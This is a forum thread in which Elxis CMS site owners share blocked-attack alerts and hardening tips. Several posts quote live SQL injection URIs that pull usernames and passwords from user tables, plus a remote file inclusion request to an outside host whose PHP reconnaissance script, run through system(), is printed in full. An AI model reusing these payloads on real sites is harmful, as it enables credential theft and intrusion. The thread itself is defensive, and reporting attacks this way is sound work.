Combination of attacks in 3 sites

[nikos65]

1.Site 
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
Requested URI: /index2.php?option=ds-syndicate&version=1&feed_id=1 union select 1,cast(concat(username,0x3a,0x3a,0x3a,password,0x3a,usertype) as binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from nstp_users limit 1,1--
DATE: 16-10-2008 13:48:28
Attack was logged


2.site
 Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
DATE: 16-10-2008 15:02:13
Attack was logged

3.site
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
DATE: 16-10-2008 15:02:15
Attack was logged
Combination of attacks in 3 sites

Thanks elxis 

[nikos65]

Just notice that earlier today i have another attack from the same ip in another site

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
DATE: 16-10-2008 11:49:31
Attack was logged


I ve just check

Whois Record

inetnum:        213.132.76.0 - 213.132.76.255
netname:        KTC-FTTB
descr:          Kubtelecom FTTB network
descr:          Russian Federation

[datahell]

I also face an increased number of attacks these days. Mostly from china and japan (as usual...)

[rentasite]

Got some attacks from the same ip (213.132.76.26).  On 4-5 Elxis sites.

I banned the IP from my server also.

[nikos65]

Probably the attacker use static ip !!
If i was the attacker i will never use the same ip to attack

[datahell]

Secure your PHP and your web server, use Elxis security tools and your site would be like a fortress.
You have nothing to worry about for these kind of attacks. They usually use pre-made scripts that scan massively sites for certain joomla components with security holes.

They are amateurs but you must always be careful. A friend's server was hacked lately due to bad server set up. The hacker with a simple pre-made php script that uploaded to a site gained access to 468 web sites on the server (cpanel accounts, databases, ftp accounts, etc)!

Simple but affective server security guide:
Disable the PHP functions that Elxis proposes you to disable in the first step of the installation procedure (exec, system, popen, dl, set_time_limit, ini_set, etc).

[jimmyz]

I got one here too...

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 82.197.222.145
Requested URI: /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt???
DATE: 19-12-2008 01:05:10
Attack was logged
Site turned offline for 120 seconds

If one type

Code: [Select]

http://www.europeytu.com/.httpaccess/roid.txt then, he can see :

Code: [Select]

<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>
As far as I know (very, very little), .httpaccess is a file, not a folder. How can they have ../.httpaccess/roid.txt?
Is it possible that they don't have a file named .httpaccess, but a folder?
And, do you think www.europeytu.com is aware of this? Should I inform them?

My access.log says:

82.197.222.145 - - [19/Dec/2008:01:05:02 -0600] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt??? HTTP/1.1" 200 208 "-" "libwww-perl/5.79"

Bbclone:

19 Dec, 09:05:03       Ολλανδία    82.197.222.145   1       libWWW 5.79      libWWW 5.79

I can't also explain the difference in reported time of the attack.
Any ideas?

[Ivan Trebješanin]

You can add these lines into your .htaccess file:

Code: [Select]

RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* - [F,L]

That would disable libwww agent from accessing your site.

PS
Don't worry, attacks like you quoted are not serious at all.

[jimmyz]

Ivan, thank you for the quick reply.

But, is it really the agent quilty for the attack?
Or they have just been used?

[Ivan Trebješanin]

But, is it really the agent quilty for the attack?

No, agents don't attack. But, this is very common "hacker's" tool.
Anyway, judging from the URL, this was just a script kiddie's attack. It is not worth of attention.

[rentasite]

Today i got this:

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 193.111.244.21 (blocked)
Requested URI: /index.php?option=com_user&task=confirmreset
DATE: 14-01-2009 14:55:01
Attack was logged

[rentasite]

Today

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106 (blocked)
Requested URI: /com_downloads/elxis-templates//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:24:55
Attack was logged

[CREATIVE Options]

Welcome

Code: [Select]

//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*

Code: [Select]

/com_downloads//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Of course all have been blocked! thanks Elxis Defender !

[ks-net]

Elxis become a famous cms.....

IT IS THE FIRST TIME I SEE AN ELXIS COMPOMENT IN URLS AND NOT JOOMLA-MAMBO...

[CREATIVE Options]

Elxis become a famous cms.....

IT IS THE FIRST TIME I SEE AN ELXIS COMPOMENT IN URLS AND NOT JOOMLA-MAMBO...

Kosta, I have seen similar attacks before, and ALL the attacks have been blocked successfully.
I run some websites, which have HIGH level of risk and they have been targeted many times. And some of these attacks was specific for the Elxis code.

I have posted in the past guides / instructions to setup the Elxis Defender for HIGH risk websites, you can find it in the forum.